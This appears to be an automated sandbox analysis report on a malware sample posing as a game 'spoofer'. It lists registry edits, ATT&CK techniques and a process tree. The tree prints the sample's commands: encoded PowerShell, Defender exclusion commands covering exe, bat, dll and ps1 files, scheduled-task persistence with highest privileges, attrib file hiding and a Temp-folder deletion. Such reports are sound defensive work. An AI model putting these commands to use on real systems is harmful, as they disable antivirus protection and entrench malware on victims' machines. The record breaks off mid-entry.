Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-812970075899428864\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NXT Cleaner.exe"	NXT Cleaner.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-812970075899428864\ = "URL:Run game 812970075899428864 protocol"	NXT Cleaner.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-812970075899428864\URL Protocol	NXT Cleaner.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Interface\ClsidStore = 0242371806519560187025261271173496526720589302762227225270	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Installer\Dependencies\MSICache = 24241288144656999715575310436609233943322412722124	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Interface	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Interface\ClsidStore = 024260277681353723305119272183625283175445098200072123725578	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-812970075899428864	NXT Cleaner.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Installer\Dependencies	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Installer\Dependencies	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Installer\Dependencies\MSICache = 02427027245159429959101028481853876221865156320793	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Installer\Dependencies\MSICache = f7765e67396d8611204d6533bbbba130f1d1789d1467f6a3ba	Cleaner.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-812970075899428864\shell	NXT Cleaner.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Interface	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-812970075899428864\DefaultIcon	NXT Cleaner.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
2284	reg.exe
5916	reg.exe
5792	reg.exe
5924	reg.exe
6124	reg.exe
5488	reg.exe
3992	reg.exe
2348	reg.exe
5340	Process not Found
5712	reg.exe
5296	reg.exe
5632	reg.exe
5796	reg.exe
5612	reg.exe
4532	reg.exe
5264	reg.exe
804	reg.exe
180	Process not Found
5396	reg.exe
5844	reg.exe
4376	reg.exe
5276	reg.exe
5292	reg.exe
5892	reg.exe
5560	reg.exe
5556	reg.exe
284	Process not Found
3032	Process not Found
3232	Process not Found
3120	reg.exe
3640	reg.exe
5636	reg.exe
4740	reg.exe
5964	reg.exe
6032	reg.exe
5616	reg.exe
5228	reg.exe
5320	reg.exe
1148	Process not Found
6044	Process not Found
2680	Process not Found
3212	Process not Found
4108	reg.exe
3724	Process not Found
1028	Process not Found
5052	reg.exe
5160	reg.exe
5328	Process not Found
3484	Process not Found
2008	Process not Found
4376	reg.exe
5284	reg.exe
5608	reg.exe
712	reg.exe
3624	Process not Found
4664	Process not Found
5052	reg.exe
5348	reg.exe
272	reg.exe
5140	reg.exe
5684	reg.exe
5752	Process not Found
1128	reg.exe
5812	reg.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5708	schtasks.exe
4680	schtasks.exe
5404	schtasks.exe
3544	schtasks.exe
4936	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4880	powershell.exe
512	powershell.exe
4880	powershell.exe
512	powershell.exe
512	powershell.exe
2596	NetworkEX.exe
2596	NetworkEX.exe
2596	NetworkEX.exe
2596	NetworkEX.exe
2596	NetworkEX.exe
2596	NetworkEX.exe
2596	NetworkEX.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3048	NEX.exe
3048	NEX.exe
3048	NEX.exe
3048	NEX.exe
3048	NEX.exe
3048	NEX.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
3416	Network Experience.exe
2596	NetworkEX.exe
2596	NetworkEX.exe
2596	NetworkEX.exe
2596	NetworkEX.exe
2596	NetworkEX.exe
2596	NetworkEX.exe
2596	NetworkEX.exe
2596	NetworkEX.exe
2596	NetworkEX.exe
2596	NetworkEX.exe
2596	NetworkEX.exe
2596	NetworkEX.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3092	NXT Cleaner.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

description	pid	Process
Token: SeDebugPrivilege	3416	Network Experience.exe
Token: SeDebugPrivilege	3700	Network.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeDebugPrivilege	2596	NetworkEX.exe
Token: SeDebugPrivilege	512	powershell.exe
Token: SeDebugPrivilege	828	taskkill.exe
Token: SeBackupPrivilege	956	vssvc.exe
Token: SeRestorePrivilege	956	vssvc.exe
Token: SeAuditPrivilege	956	vssvc.exe
Token: SeDebugPrivilege	4420	taskkill.exe
Token: SeDebugPrivilege	1452	taskkill.exe
Token: SeDebugPrivilege	4864	taskkill.exe
Token: SeDebugPrivilege	4968	taskkill.exe
Token: SeDebugPrivilege	220	taskkill.exe
Token: SeDebugPrivilege	4648	taskkill.exe
Token: SeDebugPrivilege	3048	NEX.exe
Token: SeDebugPrivilege	2756	taskkill.exe
Token: SeDebugPrivilege	3812	taskkill.exe
Token: SeDebugPrivilege	1440	taskkill.exe
Token: SeDebugPrivilege	4648	taskkill.exe
Token: SeDebugPrivilege	4480	NetworkEX.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	3496	NetworkXE.exe
Token: SeIncreaseQuotaPrivilege	4884	powershell.exe
Token: SeSecurityPrivilege	4884	powershell.exe
Token: SeTakeOwnershipPrivilege	4884	powershell.exe
Token: SeLoadDriverPrivilege	4884	powershell.exe
Token: SeSystemProfilePrivilege	4884	powershell.exe
Token: SeSystemtimePrivilege	4884	powershell.exe
Token: SeProfSingleProcessPrivilege	4884	powershell.exe
Token: SeIncBasePriorityPrivilege	4884	powershell.exe
Token: SeCreatePagefilePrivilege	4884	powershell.exe
Token: SeBackupPrivilege	4884	powershell.exe
Token: SeRestorePrivilege	4884	powershell.exe
Token: SeShutdownPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeSystemEnvironmentPrivilege	4884	powershell.exe
Token: SeRemoteShutdownPrivilege	4884	powershell.exe
Token: SeUndockPrivilege	4884	powershell.exe
Token: SeManageVolumePrivilege	4884	powershell.exe
Token: 33	4884	powershell.exe
Token: 34	4884	powershell.exe
Token: 35	4884	powershell.exe
Token: 36	4884	powershell.exe
Token: SeDebugPrivilege	5720	powershell.exe
Token: SeDebugPrivilege	5212	powershell.exe
Token: SeDebugPrivilege	5944	powershell.exe
Token: SeDebugPrivilege	5884	powershell.exe
Token: SeTakeOwnershipPrivilege	4884	Cleaner.exe
Token: SeDebugPrivilege	5596	$77NetworkEX.exe
Token: SeDebugPrivilege	2752	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe
4736	msedge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4480	NetworkEX.exe
3496	NetworkXE.exe
5596	$77NetworkEX.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4864 wrote to memory of 4880	4864	Proxy's Spoofer V2.exe	84
PID 4864 wrote to memory of 4880	4864	Proxy's Spoofer V2.exe	84
PID 4864 wrote to memory of 4880	4864	Proxy's Spoofer V2.exe	84
PID 4864 wrote to memory of 3616	4864	Proxy's Spoofer V2.exe	86
PID 4864 wrote to memory of 3616	4864	Proxy's Spoofer V2.exe	86
PID 4864 wrote to memory of 3616	4864	Proxy's Spoofer V2.exe	86
PID 4864 wrote to memory of 3092	4864	Proxy's Spoofer V2.exe	87
PID 4864 wrote to memory of 3092	4864	Proxy's Spoofer V2.exe	87
PID 4864 wrote to memory of 2636	4864	Proxy's Spoofer V2.exe	89
PID 4864 wrote to memory of 2636	4864	Proxy's Spoofer V2.exe	89
PID 4864 wrote to memory of 1200	4864	Proxy's Spoofer V2.exe	91
PID 4864 wrote to memory of 1200	4864	Proxy's Spoofer V2.exe	91
PID 3616 wrote to memory of 512	3616	NetworkEX.exe	93
PID 3616 wrote to memory of 512	3616	NetworkEX.exe	93
PID 3616 wrote to memory of 512	3616	NetworkEX.exe	93
PID 4864 wrote to memory of 2628	4864	Proxy's Spoofer V2.exe	94
PID 4864 wrote to memory of 2628	4864	Proxy's Spoofer V2.exe	94
PID 3616 wrote to memory of 3416	3616	NetworkEX.exe	96
PID 3616 wrote to memory of 3416	3616	NetworkEX.exe	96
PID 3616 wrote to memory of 3700	3616	NetworkEX.exe	98
PID 3616 wrote to memory of 3700	3616	NetworkEX.exe	98
PID 3616 wrote to memory of 2596	3616	NetworkEX.exe	99
PID 3616 wrote to memory of 2596	3616	NetworkEX.exe	99
PID 2636 wrote to memory of 4780	2636	nExOs.exe	100
PID 2636 wrote to memory of 4780	2636	nExOs.exe	100
PID 3616 wrote to memory of 3048	3616	NetworkEX.exe	101
PID 3616 wrote to memory of 3048	3616	NetworkEX.exe	101
PID 4780 wrote to memory of 828	4780	cmd.exe	102
PID 4780 wrote to memory of 828	4780	cmd.exe	102
PID 3092 wrote to memory of 4616	3092	NXT Cleaner.exe	103
PID 3092 wrote to memory of 4616	3092	NXT Cleaner.exe	103
PID 2628 wrote to memory of 1404	2628	AccuracyFN Swoofer.exe	106
PID 2628 wrote to memory of 1404	2628	AccuracyFN Swoofer.exe	106
PID 2628 wrote to memory of 452	2628	AccuracyFN Swoofer.exe	109
PID 2628 wrote to memory of 452	2628	AccuracyFN Swoofer.exe	109
PID 2628 wrote to memory of 3792	2628	AccuracyFN Swoofer.exe	111
PID 2628 wrote to memory of 3792	2628	AccuracyFN Swoofer.exe	111
PID 1404 wrote to memory of 4420	1404	cmd.exe	131
PID 1404 wrote to memory of 4420	1404	cmd.exe	131
PID 2628 wrote to memory of 4496	2628	AccuracyFN Swoofer.exe	114
PID 2628 wrote to memory of 4496	2628	AccuracyFN Swoofer.exe	114
PID 2628 wrote to memory of 4500	2628	AccuracyFN Swoofer.exe	117
PID 2628 wrote to memory of 4500	2628	AccuracyFN Swoofer.exe	117
PID 3792 wrote to memory of 1452	3792	cmd.exe	118
PID 3792 wrote to memory of 1452	3792	cmd.exe	118
PID 2628 wrote to memory of 2896	2628	AccuracyFN Swoofer.exe	119
PID 2628 wrote to memory of 2896	2628	AccuracyFN Swoofer.exe	119
PID 2636 wrote to memory of 3704	2636	nExOs.exe	121
PID 2636 wrote to memory of 3704	2636	nExOs.exe	121
PID 2628 wrote to memory of 1232	2628	AccuracyFN Swoofer.exe	123
PID 2628 wrote to memory of 1232	2628	AccuracyFN Swoofer.exe	123
PID 3092 wrote to memory of 3396	3092	NXT Cleaner.exe	124
PID 3092 wrote to memory of 3396	3092	NXT Cleaner.exe	124
PID 452 wrote to memory of 4864	452	cmd.exe	125
PID 452 wrote to memory of 4864	452	cmd.exe	125
PID 2628 wrote to memory of 4904	2628	AccuracyFN Swoofer.exe	126
PID 2628 wrote to memory of 4904	2628	AccuracyFN Swoofer.exe	126
PID 4500 wrote to memory of 4968	4500	cmd.exe	671
PID 4500 wrote to memory of 4968	4500	cmd.exe	671
PID 4496 wrote to memory of 220	4496	cmd.exe	128
PID 4496 wrote to memory of 220	4496	cmd.exe	128
PID 3704 wrote to memory of 4648	3704	cmd.exe	153
PID 3704 wrote to memory of 4648	3704	cmd.exe	153
PID 3092 wrote to memory of 3328	3092	NXT Cleaner.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1744	attrib.exe
4720	attrib.exe

C:\Users\Admin\AppData\Local\Temp\proxy's woofer\Proxy's Spoofer V2.exe
"C:\Users\Admin\AppData\Local\Temp\proxy's woofer\Proxy's Spoofer V2.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4864
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AegBkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AcABiACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4880
- C:\Windows\NetworkEX.exe
  "C:\Windows\NetworkEX.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3616
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AbABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAeAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABoACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:512
- - C:\Users\Admin\AppData\Roaming\Network Experience.exe
    "C:\Users\Admin\AppData\Roaming\Network Experience.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3416
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NetworkEX" /tr '"C:\Users\Admin\AppData\Roaming\NetworkEX.exe"' & exit
      4⤵
      PID:2736
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "NetworkEX" /tr '"C:\Users\Admin\AppData\Roaming\NetworkEX.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCDDF.tmp.bat""
      4⤵
      PID:1708
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:1364
    - - C:\Users\Admin\AppData\Roaming\NetworkEX.exe
        
        "C:\Users\Admin\AppData\Roaming\NetworkEX.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4480
- - C:\Windows\Network.exe
    "C:\Windows\Network.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:3700
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Network.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5212
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\NetworkEXP.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5944
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NetworkEXP.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5884
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "NetworkEXP" /tr "C:\Users\Admin\AppData\Roaming\NetworkEXP.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5708
- - C:\Users\Admin\NetworkEX.exe
    "C:\Users\Admin\NetworkEX.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2596
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NetworkXE" /tr '"C:\Users\Admin\AppData\Roaming\NetworkXE.exe"' & exit
      4⤵
      PID:4236
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "NetworkXE" /tr '"C:\Users\Admin\AppData\Roaming\NetworkXE.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4936
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD5ED.tmp.bat""
      4⤵
      PID:1248
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:372
    - - C:\Users\Admin\AppData\Roaming\NetworkXE.exe
        
        "C:\Users\Admin\AppData\Roaming\NetworkXE.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3496
- - C:\Users\Admin\AppData\Local\NEX.exe
    "C:\Users\Admin\AppData\Local\NEX.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3048
  - - C:\Windows\System32\attrib.exe
      "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Temp"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:1744
  - - C:\Windows\System32\attrib.exe
      "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Temp\$77NetworkEX.exe"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:4720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp293E.tmp.bat""
      4⤵
      PID:3992
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:5924
    - - C:\Users\Admin\AppData\Roaming\Temp\$77NetworkEX.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\$77NetworkEX.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:5596
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77NetworkEX.exe
        6⤵
        
        PID:5980
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /Create /SC ONCE /TN "$77NetworkEX.exe" /TR "C:\Users\Admin\AppData\Roaming\Temp\$77NetworkEX.exe \"\$77NetworkEX.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4680
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77NetworkEX.exe
        6⤵
        
        PID:3616
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2752
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "NetworkEX_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5404
- C:\Users\Admin\AppData\Local\Temp\NXT Cleaner.exe
  "C:\Users\Admin\AppData\Local\Temp\NXT Cleaner.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of WriteProcessMemory
  PID:3092
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:3396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start https://nxt.lol/
    3⤵
    PID:3328
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://nxt.lol/
      4⤵
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:4736
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd055346f8,0x7ffd05534708,0x7ffd05534718
        5⤵
        
        PID:4528
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,8728941247112618245,15873002647690444876,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1992 /prefetch:2
        5⤵
        
        PID:3720
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,8728941247112618245,15873002647690444876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
        5⤵
        
        PID:2116
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,8728941247112618245,15873002647690444876,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
        5⤵
        
        PID:2304
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8728941247112618245,15873002647690444876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
        5⤵
        
        PID:4036
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8728941247112618245,15873002647690444876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
        5⤵
        
        PID:3728
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8728941247112618245,15873002647690444876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1
        5⤵
        
        PID:5220
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,8728941247112618245,15873002647690444876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
        5⤵
        
        PID:5236
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1920,8728941247112618245,15873002647690444876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4216 /prefetch:8
        5⤵
        
        PID:6020
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
